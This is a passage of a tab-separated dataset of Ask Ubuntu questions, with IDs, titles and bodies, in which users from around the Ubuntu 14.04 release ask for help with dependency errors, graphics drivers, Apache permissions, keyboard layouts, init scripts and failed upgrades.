opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 ld-linux-x86-64.so.2 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 ld-linux-x86-64.so.2 ( glibc_2.3 ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 lsb-core-amd64 > = 4.0 is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libfontconfig.so.1 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libfreetype.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libglib-2.0.so.0 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libgobject-2.0.so.0 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libgthread-2.0.so.0 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libice.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libnuma.so.1 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libpng12.so.0 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libpng12.so.0 ( png12_0 ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libsm.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( cxxabi_1.3.1 ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( cxxabi_1.3 ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( glibcxx_3.4 ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libstdc++.so.6 ( glibcxx_3.4.9 ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libx11.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libxext.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 libxrender.so.1 ( ) ( 64bit ) is needed by opencl-1.2-intel-devel-1:3.2.1.16712-1.x86_64 however , i have some libraries in my filesystem already . for example , when i use locate , i can find libx11.so.6 in /usr/lib/x86_64-linux-gnu/ . do i miss something ? thanks !
451898	gtk3 theme : where are these colours located in css	can someone please tell me where the following colours are located in the css : the separators in the menus the separation line for gedit when `` display right margin at column ... '' is checked in preferences same gedit , the left margin when `` display line numbers '' is checked . thank you in advance
451902	add to path only sh file not a dir	i have a bin folder with a bunch of sh files . for example `` server-run.sh '' , `` server-stop.sh '' , `` server-do-something.sh '' . and i want to run file `` server-stop.sh '' from anywhere . i could add this bin folder to path but `` run '' and `` do-something '' files also will be available and i do n't want to pollute my console . also i do n't want to add this file to /bin folder , because it could change . maybe link . can i somehow add only `` server-stop.sh '' to path ?
451905	weird behavior of ubuntu gnome 14.04 lts live session	i downloaded the ubuntu gnome 14.04 lts ( i386 ) iso file yesterday . i burned it on a 2gb usb drive to make a bootable pen drive . ( i used lili for that purpose on windows ) i booted by the pen drive with nomodeset flag ( without that , i only get a blank screen forever ) . it successfully takes me to the gui . i can open the dash . but when i try to launch an application , say install ubuntu gnome , or files , or firefox , or gedit , some loading thing happens , a few black screens appear and go quickly with some white code written on them , which i ca n't read as they go off quite quickly . and , i get redirected to the login screen . there is only one user there - live session user . i click on it and use blank password . but again those black screens appear and i get back to the login screen . my attempts ( and how it fails ) : switching to tty2 console and launching startx ( same problem carries on there as well ) verifying iso file ( md5 is matching ) using different tools to burn the usb ( i tried startup disk creator inbuilt in ubuntu but same problem , and unetbootin as well ) loading gnome classic from login screen ( same problem ) my system specs : intel core 2 duo processor , ati rage xl pro , 2gb kingston ddr2 ram , intel g31 chipset ( onboard graphics are dead ) , seagate 250 gb hard drive , with 20gb ( ext4 ) dedicated to my present ubuntu installation . presently using ubuntu 12.04 lts ( normal , not gnome version , but with gnome classic installed ) . also , i have another wd 80gb hard drive with windows . please help me fix this issue .
451909	hostapd.conf ca n't be read when strating hostapd	ok , i wanted to use hostapd build ap connection . after i have finished some basic configuration in hostapd.conf , i started hostapd . however , it says that : could not open configuration file '/etc/hostapd/hostapd.conf ' for reading . then i use chmod to make hostapd.conf as 777 , but it is useless . i do n't know what the problem is , and could you help me ? thanks ! !
451912	is is possible to change super + t to terminal ?	so now that 14.04 was released and the most active questions on this are from 2011 to 2012 ( [ 1 ] and [ 2 ] ) , i 'd like to ask again just out of hope : is it possible to change super + t from starting the trash to starting the terminal without altering all the other shortcuts related to super ? or what are your current best practices to deal with this ?
451917	ubuntu 12.04 hangs intermittently	i have a ubuntu 12.04 lts 64bit pc that i upgraded to from ubuntu 10.04 lts 64bit quite some time ago . i 've been noticing sporadic system hangs and i ca n't figure what exactly is causing it . the pc simply stops responding , and requires a system reset . are there any logs that survive the reboot that might let me know what exactly caused the hang and what i can do to fix it ? thanks .
451918	libc6-amd64 dependency problem	i 'm trying to install fglrx manually from the amd website however it keeps complaining that it 's missing the dependency `` libc6-amd64 '' . when i run the fglrx package through gdebi i get this message : this package is uninstallable dependency is not satisfiable : libc6-amd64 ( > = 2.9 ) even though it 's installed ... dpkg -l | grep libc6 ii libc6 : amd64 2.19-0ubuntu6 amd64 embedded gnu c library : shared libraries ii libc6 : i386 2.19-0ubuntu6 i386 embedded gnu c library : shared libraries ii libc6-amd64 2.19-0ubuntu6 i386 embedded gnu c library : 64bit shared libraries for amd64 ii libc6-dbg : amd64 2.19-0ubuntu6 amd64 embedded gnu c library : detached debugging symbols ii libc6-dev : amd64 2.19-0ubuntu6 amd64 embedded gnu c library : development libraries and header files ii libc6-i386 2.19-0ubuntu6 amd64 embedded gnu c library : 32-bit shared libraries for amd64 in the end , i managed to get fglrx to install using the below command which ignored all dependencies : sudo dpkg -i -- force-all fglrx*.deb though i was wondering if anyone knows how to fix this since in apt i now get this error : apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : fglrx : depends : libc6-amd64 ( > = 2.9 ) but it is not installable fglrx-amdcccle : depends : libc6-amd64 ( > = 2.3 ) but it is not installable e : unmet dependencies . try using -f .
451919	easy way to check installed software and configurations ?	i am wondering if there is an easy way to make sure to get a list of all installed software on an ubuntu server ( both from source and from apt-get ) . this should hopefully include important data directories and cronjobs . the reason for this is that there needs to be an extra server holding the exact same software as the current machine ( same cronjobs , website files , software , databases etc ) but there is no documentation or list of what is installed and what is not . ( this is a live-production server with always users being online , making a clone is not a feasible option due to the shear size ( we are talking 1tb+ of data ) and we need to get it documented somehow anyway what is installed and what is important )
451920	i 'm running ubuntu 14.04 and the broadcom bcm43241 card in my vaio duo 13 does n't even show up	i have tried all the known solutions and it still wo n't work . i have tried the brcm modprobe after updating the firmware library as well as doing the blacklist thing for bcm43xx . is there a fix for this ? ? -- -- -- -edit -- -- -- the lspci -nn command would n't do anything lspci i cant post pictures yet but here is the output lspci lspci 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 )
451921	unable to access “ubuntu 14.04 lts amd64” iso burned dvd	burned the iso on at least 3 different drives but none will mount ? unable to access “ubuntu 14.04 lts amd64” dvd : mount exited with non-zero exit status 32 : mount : unknown filesystem type 'iso9660'
451922	apache : access denied because search permissions are missing	i know this question is asked a lot , but the solutions i saw did n't work for me . i only have one virtual host enabled , and i 'm trying to enable access to a folder that 's not under the document roots serveradmin webmaster @ localhost documentroot /var/www/html alias /movies /home/username/videos/movies < directory /home/username/videos/movies/ > options indexes followsymlinks allowoverride none require all granted < /directory > i set /etc/apache2/envvars as follows export apache_run_user=www-data export apache_run_group=public i made sure that /home/username/videos/ and it 's sub floders are owned by username : public , set the permissions to 777 ( after 775 did n't work ) and made sure that user www-data belongs to group public . now , when i enter localhost/movies i get [ mon apr 21 11:28:14.971844 2014 ] [ core : error ] [ pid 1385 : tid 140067725104896 ] ( 13 ) permission denied : [ client 127.0.0.1:46603 ] ah00035 : access to /movies/ denied ( filesystem path '/home/username/videos ' ) because search permissions are missing on a component of the path but when i set /etc/apache2/envvars to run apache under username ( my own username ) everything works fine . the problem is permission related , but i do n't see how in my case , especially when i set the permissions to 777 . any ideas ? thanks ! p.s . ubuntu version is 14.04 , apache is 2.4.7 and i did n't edit other configuration files .
451924	installation of ubuntu 14.04 `` restart installation ''	my problem is that i have a live usb installer for ubuntu 14.04 , it loads fine until the installer is giving me a choice of installing it along side windows7 , delete windows 7 and some other options , i choose alongside windows7 and i click continue , the installer shutdown and restart and open the ubuntu installation again . please help .
451926	install php in ubuntu 14.04 lts	i have ubuntu 14.04 lts ( 32bit ) . i want to install php5.5 . i installed apache server and i see default apache server index page on localhost correctly . but , when i try to install php5 with apt-get install php5 , i get error for unmet dependencies . also i try : apt-get install lamp-server^ but i get this error : the following packages have unmet dependencies : php5-json : depends : phpapi-20121212+lfs e : unable to correct problems , you have held broken packages . any idea ?
451931	`` operation system not found '' dell xps 15z l511z	although title is the same problem is different . i 've installed ubuntu 14.04 trusty on my hp elitebook 6930p notebook . and i was trying to create a bootable usb for my dell xps 15z . after successful creation of usb with usb-creator-gtk i plugged in bootable usb stick to dell laptop . the error message was `` operation system not found '' . i tried several things but could not make it . when i check from working ubuntu , i can see that usb is bootable and has files for installation .
451932	environment variable spoiled	in ~/.profile i have this : . `` $ home/projects/devenv.sh '' in $ home/projects/devenv.sh i have : basedir= $ ( dirname $ 0 ) export apilib_config= '' $ basedir/apilib.conf '' echo `` $ apilib_config '' when i open a konsole session i get : /home/vic/projects/apilib.conf vic @ vic ~/projects/ $ env|sort apilib_config=/usr/sbin/apilib.conf ... so apilib_config environment variable value inside ~/.profile is correct , but when inside zsh , it 's has wrong path . how can this happen ?
451933	14.04 : re-enabling unity style notification in unity after xubuntu-desktop install ?	ubuntu 14.04 , i installed xubuntu-desktop to get access to both unity and xfce . however now , in unity the notifications are messed up : no transparency , sound change and brightness change do not show up , etc ... the question is : how to re-enable the unity style notification in unity ? what i did : sudo apt-get install -- reinstall notify-osd but that did not change anything . i found this question unity notifications messed up after installing gnome but there is no correct answer . by the way the rational for this dual desktop environment is in order to have full access to the systray which can not be white listed in 14.04 anymore . however i still run unity as my main desktop , only log out and login to xfce when i need to interact with the systray ( for davmail for example ) . thanks a lot in advance , seb
451934	baloo not working	the new kde indexing service is of fundamental importance ( as was nepomuk before it ) but , unfortunately , it does not work as it should on my machine with kubuntu 14.04 . indeed , it does not work at all , both via dolphin nor via the milou interface . i already filled a bug , but i wanted to know if someone has experienced the same problem and maybe solved it , or has some idea on where to look for a solution or more informations on what is not working .
451935	write to user defined partition /data	i 'm a newbie in linux/ubuntu/xubuntu world . in order to supply data encapsulation i defined separate partition `` /data '' on my hdd , where i want to store all my user data , separately from system-related data , this will allow me to format/reinstall ubuntu without any issue . i enter to /data/ and find out , that i do n't have permissions to write to this folder . how can i enable it ? i want to have ability to store all my data in this path and to have ability to format/remove & recreate other partitions .
451936	video speed too low at ubuntu 14.04	i have just upgraded from ubuntu 11.10 to 14.04 . speed in loading , saving etc . is ok or better than in the old version . video speed , however , is terribly low , just about 3 frames/second , no videos can be run and changes from one application to the other take to much time just for fading out the old and growing in the new application . could be a problem of the graphics driver - but how can i find and install a better one ?
451938	how do i know if the kernel was build with config_modversions ?	i am running ubuntu : # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise # # heading # # and : kernel info : 3.8.0-38-generic # 56~precise1-ubuntu smp thu mar 13 16:23:47 utc 2014 i686 i686 i386 gnu/linux i would like to know that whether this running kernel was build using config_modversions or not . any command for that ? update # /usr/src/ubuntu-precise # make oldconfig | grep config_modversions /boot/config-3.8.0-38-generic:3420 : warning : symbol value 'm ' invalid for spi_pxa2xx_pci /boot/config-3.8.0-38-generic:4222 : warning : symbol value 'm ' invalid for video_em28xx_rc /boot/config-3.8.0-38-generic:6694 : warning : symbol value 'm ' invalid for nfs_v3 /boot/config-3.8.0-38-generic:6696 : warning : symbol value 'm ' invalid for nfs_v4 no progress after this . hanging here for more than 30 minutes
451941	ca n't connect to mobile broadband 14.04 lts	when i plug the modem i have a mobile broadband option in network menu bar , and i add new mobile broadband connection , and everything is fine . but , when i try to connect it , suddenly the mobile broadband option in network menu bar dissapear . . so i have to unplug it and plug it again in my laptop to display the mobile broadband option . . . i connect it again , and dissapear again . . . how can i connect to my mobile broadband ? ? i 'm using aego modem . under ubuntu 14.04 lts operating system
451944	eclipse ide hello world problem	i 'm having problems running a simple java program `` hello world '' i had installed the eclipse java ee ide from eclipse site and before it i had installed jdk btw im using ubuntu 14.04 any ideas ?
451945	permanently set keyboard layout options with setxkbmap in gnome/unity	ubuntu 13.101 ( and maybe upstream gnome ) introduced very annoying bug : pressing keyboard layout switch shortcut makes focus go away to some system window , then back to window where shortcut was pressed . some applications have some actions bound to change of focus , for example twitter ( in browser ) closes reply text input field when losing focus , etc . so ubuntu 's native keyboard switcher is n't suitable for me , until fixed . x has builtin switching mechanism , and it is much better , in addition to that it does not involve focus switching , it switches immediately ( gnome switcher also sometimes lags ) . how can i set up xkbmap options so settings will remain after reboot and will not be reset by gnome ? what i 've tried : first , just executing setxkbmap : setxkbmap -layout `` us , ru '' setxkbmap -option `` grp : caps_toggle , grp_led : scroll , compose : ralt '' but it works only : for current session until gnome will overwrite it ( for example touching something in gconf 's org.gnome.desktop.input-sources triggers reset ) . second , adding xkb options to xorg config : another option is to add following to xorg config : section `` inputclass '' identifier `` system-keyboard '' matchiskeyboard `` on '' option `` xkblayout '' `` us , ru '' option `` xkbmodel '' `` pc105 '' option `` xkbvariant '' `` pc105 '' option `` xkboptions '' `` grp : rctrl_toggle , grp_led : scroll '' endsection xorg understands that during startup : [ 33.791 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 33.791 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 33.791 ] ( ** ) option `` xkb_layout '' `` us , ru '' [ 33.791 ] ( ** ) option `` xkb_variant '' `` pc105 '' [ 33.791 ] ( ** ) option `` xkb_options '' `` grp : rctrl_toggle , grp_led : scroll '' but switching configuration still resets later , likely by gnome . third , gconf i have xkb-options and sources set in org.gnome.desktop.input-sources , but gnome still sets xkb to single english layout : $ setxkbmap -print -verbose 10 setting verbose level to 10 locale is c trying to load rules file ./rules/evdev ... trying to load rules file /usr/share/x11/xkb/rules/evdev ... success . applied rules from evdev : rules : evdev model : pc105 layout : us options : grp_led : scroll trying to build keymap using the following components : keycodes : evdev+aliases ( qwerty ) types : complete compat : complete+ledscroll ( group_lock ) symbols : pc+us+inet ( evdev ) geometry : pc ( pc105 ) xkb_keymap { xkb_keycodes { include `` evdev+aliases ( qwerty ) '' } ; xkb_types { include `` complete '' } ; xkb_compat { include `` complete+ledscroll ( group_lock ) '' } ; xkb_symbols { include `` pc+us+inet ( evdev ) '' } ; xkb_geometry { include `` pc ( pc105 ) '' } ; } ; fourth , another option in gconf setting org.gnome.settings-daemon.peripherals.keyboard also does not work for me . nothing changes . upd 1 : there is discussion recommending to remove /usr/lib/gnome-settings-daemon-3.0/libkeyboard.so . at least this fixes some resets of xkbmap ( i.e . after lock screen ) . 1 i use 14.04 , but problem with losing focus is still not fixed . ( unconfirmed report in upstream gnome )
451947	package system is broken ( oxideqt-codecs-extra ) ubuntu 14.04	so last night i tried to update using the update manager and i could n't because i encountered an error halfway through ( error : brokencount > 0 ) . today i wanted to install a package with ubuntu software center and i got an error message telling me there is a problem that needs to be fixed because my package system is broken , there was a repair button but that did n't fix anything and instead gave me another error message.. this is what i get when doing upgrade in the terminal robin @ robin-1005px : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : liboxideqtcore0 : depends : oxideqt-codecs ( = 1.0.0~bzr501-0ubuntu1 ) but 1.0.0~bzr501-0ubuntu2 is installed or oxideqt-codecs-extra ( = 1.0.0~bzr501-0ubuntu1 ) but it is not installed e : unmet dependencies . try using -f. and this is what i get when running sudo apt-get install -f robin @ robin-1005px : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : liboxideqtcore0 the following packages will be upgraded : liboxideqtcore0 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/20,8 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 168238 files and directories currently installed . ) preparing to unpack ... /liboxideqtcore0_1.0.0~bzr501-0ubuntu2_i386.deb ... unpacking liboxideqtcore0 : i386 ( 1.0.0~bzr501-0ubuntu2 ) over ( 1.0.0~bzr501-0ubuntu1 ) ... dpkg-deb ( subprocess ) : can not copy archive member from '/var/cache/apt/archives/liboxideqtcore0_1.0.0~bzr501-0ubuntu2_i386.deb ' to decompressor pipe : failed to read ( input/output error ) dpkg-deb ( subprocess ) : decompressing archive member : lzma error : unexpected end of input dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing archive /var/cache/apt/archives/liboxideqtcore0_1.0.0~bzr501-0ubuntu2_i386.deb ( -- unpack ) : can not copy extracted data for './usr/lib/i386-linux-gnu/liboxideqtcore.so.0 ' to '/usr/lib/i386-linux-gnu/liboxideqtcore.so.0.dpkg-new ' : unexpected end of file or stream errors were encountered while processing : /var/cache/apt/archives/liboxideqtcore0_1.0.0~bzr501-0ubuntu2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does anyone know how i can fix this issue ? it 's pretty annotying because i ca n't install anything and updating is also impossible.. thanks in advance !
451948	why i should remove proprietary softwares and packages to upgrade my ubuntu	i have tried to upgrade my ubuntu twice now and have n't succeeded . the first was to upgrade from 13.04 to 13.10 . yesterday i tried to upgrade from ubuntu 13.10 to 14.04 using upgrade manager but without success . what i want to know is why it is so difficult ? is it really difficult to replace old packages with new ones ? if my wifi card is not supported how i do to upgrade if must remove the drivers ? i have filled a bug report here : the response i got : the version of perl as well a several perl modules installed on your system are from debian . please revert these packages to the version from the official ubuntu repository and try the upgrade again . why i must do that if i will remove every package i have installed so it 's not upgrade it 's fresh install + keeping data .
451950	how to configure lightdm to allow manual logins in ubuntu 14.04	i used to modify /etc/lightdm/lightdm.conf , adding the line greeter-show-manual-login=true , in order to allow login for hidden users and root . now i 've just installed the new ubuntu 14.04 and the file lightdm.conf is no longer located in /etc/lightdm . it 's in /etc/init and has been totally modified . how can i force lightdm login screen to show a field to input a login name ?
451951	what will happen if i install ubuntu gnome over a regular ubuntu install ?	if i install ubuntu gnome over my already existing ubuntu install what will happen ? is it same as doing fresh install ( all installed programs/settings/etc will be deleted ) ?
451953	php-pear is not working after upgrading to ubuntu 14.04	after upgrading to ubuntu 14.04 php-pear is failing to install any packages . sudo pear install -- alldeps -- force pear.phpunit.de/phpunit downloading phpunit-4.0.17.tgz ... starting to download phpunit-4.0.17.tgz ( 509,430 bytes ) ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... done : 509,430 bytes could not extract the package.xml file from `` /build/buildd/php5-5.5.9+dfsg/pear-build-download/phpunit-4.0.17.tgz '' download of `` phpunit/phpunit '' succeeded , but it is not a valid package archive error : can not download `` phpunit/phpunit '' download failed install failed the packages are being downloaded but ca n't extract . i 've tried this solution , http : //cweiske.de/tagebuch/pear-php-5.5.htm but still getting the same problem . has anyone else encountered this ? do i need to downgrade to php5.4 ? if so , how ? . update : thanks for the quick responses . karels answer solved my problem . just for completeness the proper way to installing via pear no longer works . the steps to install from a phar file are documented at : http : //phpunit.de/getting-started.html also it is no longer necessary include/require phpunit/runner.php and autoload etc . again . thanks for the help
451954	unity error after installation on ubuntu 14.4	no application opens after installing such as synaptic , vlc , wine , etc . please help as i think there is some problem with the gui . is it got to something with the unity ?
451955	upstart script does n't work	i 'm trying to create my own script that gets executed on startup and stopped on shutdown ( referring to the classic system-v init style ) , but it wo n't work ! i 've created this script ( /etc/init.d/mlogscript ) : # ! /bin/bash # # # begin init info # provides : logging down time and date of your start/shutdown behaviour # required-start : $ all # required-stop : $ all # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : logs down your start/shutdown behaviour # description : script for logging when you start or shutdown the operating system # # # end init info # author : x # log-file info filename= '' logscript.log '' filepath= '' $ home/myscripts/ '' # other files uptimefile= $ { filepath } '' lastuptime.donotdelete '' # fetch specific data date=`date + % m. % d. % y` clock=`date + % x` case `` $ 1 '' in start ) if [ ! -e `` $ { filepath } $ { filename } '' ] ; then echo `` creating log-file '' echo -ne `` mlog : start/shutdown behaviour\n '' > > `` $ { filepath } $ { filename } '' echo -e `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -\n '' > > `` $ { filepath } $ { filename } '' fi echo -e ' [ ' $ date `` ] \nuser : \t '' $ user `` \nstart : \t '' $ clock > > `` $ { filepath } $ { filename } '' # create/update uptime-file uptime= $ ( < /proc/uptime ) uptime= $ { uptime % % . * } echo -ne $ uptime > $ uptimefile echo `` log-script started at '' $ date `` . '' ; ; stop ) if [ -e `` $ { filepath } $ { filename } '' ] ; then # get uptime from /proc/uptime uptime= $ ( < /proc/uptime ) uptime= $ { uptime % % . * } # if [ -e `` $ { uptimefile } '' ] ; then lastuptime= $ ( head -n 1 `` $ { uptimefile } '' ) uptime=`expr $ uptime - $ lastuptime` echo $ uptime fi seconds= $ ( ( uptime % 60 ) ) minutes= $ ( ( uptime/60 % 60 ) ) hours= $ ( ( uptime/60/60 % 24 ) ) days= $ ( ( uptime/60/60/24 % 365 ) ) year= $ ( ( uptime/60/60/24/365 ) ) # write to file echo -ne `` end : \t '' $ clock `` \nuptime : \ty '' $ year ' d ' $ days ' h ' $ hours ' m ' $ minutes ' s ' $ seconds `` \n\n '' > > `` $ { filepath } $ { filename } '' echo `` log-script stopped '' else echo `` log-file does n't exist '' fi ; ; restart ) if [ -e `` $ { filepath } $ { filename } '' ] ; then exec $ ( readlink -f `` $ 0 '' ) stop $ ( readlink -f `` $ 0 '' ) start echo -e `` log-script restarted '' fi ; ; reset ) echo -e `` log-script reset '' if [ -e `` $ { filepath } $ { filename } '' ] ; then rm `` $ { filepath } $ { filename } '' exec $ ( readlink -f `` $ 0 '' ) start fi ; ; esac exit 0 after that i set the owner and group of the file to `` root '' by executing sudo chown root : root /etc/init.d/mlogscript last but not least i created the runtime-specific symlinks within the rc [ 0-6 ] .d folders : sudo update-rc.d mlogscript defaults 98 after i rebooted my system nothing happens , why ?
451956	can not upgrade from ubuntu 13.10 to ubuntu 14.04	today i tried to upgrade my system to ubuntu 14.04 but during the `` setting new software channels '' process i get the following error : w : failed to fetch gzip : /var/lib/apt/lists/partial/gr.archive.ubuntu.com_ubuntu_dists_trusty_universe_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/gr.archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . what is that error and how am i going to upgrade my system now ?
451957	problem in updating ubuntu 14.04 , replaced windows 8.1	and this is happening again . even last time when i have updated from ubuntu ver 12.x to 13.x , it has replaced the windows 8 boot file with its own . and whatever i was doing ( selecting option from ubuntu boot to go back to windows loader or fixing it by using windows installation disk ) , it was n't working . even the ubuntu was not running fine , showing some bad & stretched gui , no terminal access , empty screen etc . last time i ended up with completely formatting my pc and reinstalling all fresh oses . again yesterday , as i have upgraded from 13.10 to 14.04 , this happened . what is the problem here , i am not able to understand . why ubuntu upgrading is so buggy ?
451958	ubuntu 14.04 does not start	i installed successfully the latest version 14.04 . but booting it , it tells it has found serious errors in hard-drive ? and tells to push i , s , or m to get on , but nothing helps . otherwise the pc works allright . what is wrong ?
451959	ubuntu 14.04 scroll to focus on launcher behaviour broken	back in ubuntu 13.10 if you had multiple windows of the same application open and scrolled over that application 's launcher icon it would bring up all the open windows one by one . now in ubuntu 14.04 it will only focus one window at a time while minimizing the rest . how can the previous behaviour be restored ? i mainly use this feature to bring up multiple file manager windows to transfer files from one window to the next or many other similar situations to view multiple windows at once . the new behaviour is much less practical . thank you . edit ( thanks to fossfreedom for suggesting clarification ) : ( example ) in 13.10 if i 'm in firefox and i have 3 nautilus windows running behind firefox and i scroll over the nautilus icon 1 click brings the first window in front of firefox , 2 clicks the second window , 3 clicks the third window , 4 clicks puts the first window back in focus but all 3 are visible in front of firefox . in 14.04 i can only see the window that is in focus in front of firefox , when i scroll to the next window , the previous one goes back behind firefox . after 4 clicks , only 1 window is visible https : //www.youtube.com/watch ? v=g3to8z81ygw since i 'm not getting any response or help using ask ubuntu , here is a link to the forum post : http : //ubuntuforums.org/showthread.php ? t=2227315 i 've also noticed with multiple different applications open sometimes multiple windows come up in front or behind of other applications . i would describe this feature now as severely broken . example : with multiple file manager windows open and firefox in the background and using , say , a text editor , if the text editor is in focus , then i bring a fm window in focus , then go back to firefox , if i scroll on the fm launcher icon it will bring up one window at a time , putting each one back behind firefox as i go to the next , but the one that had the text editor behind it will bring up the text editor in front of firefox , behind the fm window .
451960	install grub in windows manually ?	'm shayne . i am using windows 7 . and also i used ubuntu 12.4 . but i had to reinstall windows 7 and now the grub has gone . can i install grub here logging in windows ? if so how could i do it ?
451961	ubuntu 14.04 installation problems on samsung netbook	i have had problems installing ubuntu 14.04 on a samsung n10 netbook running windows xp . in order to overcome the security problems with unsupported windows xp i successfully installed ubuntu 12.04 using the windows wizard . i then installed 13.10 ( a bit more tricky as no wizard ) and ran it successfully for several weeks . when ubuntu software update proposed upgrading to 14.04 , i selected this ... and then the trouble began . the update proceeded smoothly until it was 'preparing fonts ' and it stuck there for several hours , went no further and i could not get the computer to do anything . i switched it off ( mistake but i could not think of anything else ) and when it rebooted ubuntu would not run at all . fortunately windows was still available . i uninstalled ubuntu . on the ubuntu website i followed the procedure for booting from a usb stick without success - the samsung has no cd drive and it will not boot from a usb stick . following helpful advice on ubuntu answers i copied the relevant files from the usb stick to my hard drive and launched wubi from there . the installation proceeded smoothly but when i rebooted into ubuntu , error messages appeared : 'serious errors found when checking the disk drive for / . ' , 'the disk drive for /tmp is not ready yet or not present ' and 'an error occurred when mounting /. ' . i uninstalled ubuntu and tried again but the result was the same . as i could not find any solution , i then uninstalled ubuntu 14.04 and reinstalled 13.10 . this was successful and it is running fine . having spent many hours on these fruitless attempts to upgrade to ubuntu 14.04 i am now rather wary . can anyone suggest a reliable solution , or should i stay with 13.10 until installation of 14.04 is sorted out ?
451963	autogen.sh not found for webkit	i 'm trying to install webkit in ubuntu 12.04 following this instructions : https : //help.ubuntu.com/community/webkit when i get to this instruction : ./autogen.sh -- prefix=/usr i got an error message : bash : ./autogen.sh : file or directory not found i thought the script autogen.sh should be in the directory i had downloaded , but it is not there . so i 've tried to download it from here : http : //sourceforge.net/projects/buildconf/files/latest/download and put it in the directory in which i 'm working ( following the instructions in : ~/src/webkit $ ) . but it does n't work either . ~/src/webkit $ ./autogen.sh -- prefix=/usr unknown option : -- prefix=/usr usage : ./autogen.sh [ -h| -- help ] [ -v| -- verbose ] [ -q| -- quiet ] [ -d| -- download ] [ -- version ] -- help help on autogen.sh usage -- verbose verbose progress output -- quiet quiet suppressed progress output -- download download the latest config.guess from gnulib -- version only perform gnu build system version checks description : this script will validate that minimum versions of the gnu build system tools are installed and then run autoreconf for you . should autoreconf fail , manual preparation steps will be run potentially accounting for several common preparation issues . the autoreconf , autoconf , automake , libtoolize , aclocal , autoheader , project , & configure environment variables and corresponding _options variables ( e.g . autoreconf_options ) may be used to override the default automatic detection behavior . autogen.sh build preparation script by christopher sean morrison + config.guess download patch by sebastian pipping ( 2008-12-03 ) revised 3-clause bsd-style license , copyright ( c ) 2005-2009 script version 20090301 , iso/iec 9945 posix shell script what can i do ?
451966	how to install ati hybrid graphics in ubuntu 13.10 saucy in dell inspiron 3521	i am trying to install ati graphics driver from the last one week . i tried almost every possible option available online . but still no success with installation . i am using dell inspiron 3521 laptop . the graphic card is of series 87xx . whenever i install driver . it gaves me error [ error ] kernel module : failed to build fglrx-13.251 with dkms [ error ] kernel module : removing fglrx-13.251 from dkms dkms part of installation failed . i also tried to install using this patch https : //gist.github.com/moldcraft/8116528 sometimes i was able to install them . but everything disappears after login or sometimes it goes to low graphics mode . i do n't know what is wrong with my laptop or my installation . my laptop configuration : model : dell inspiron 3521 processor : i3 third generation ram : 4 gb hard disk : 500gb graphics cards : intel graphics media accelerator 4000 hd , ati readon hd 87xx series . os : ubuntu saucy salamander 13.10
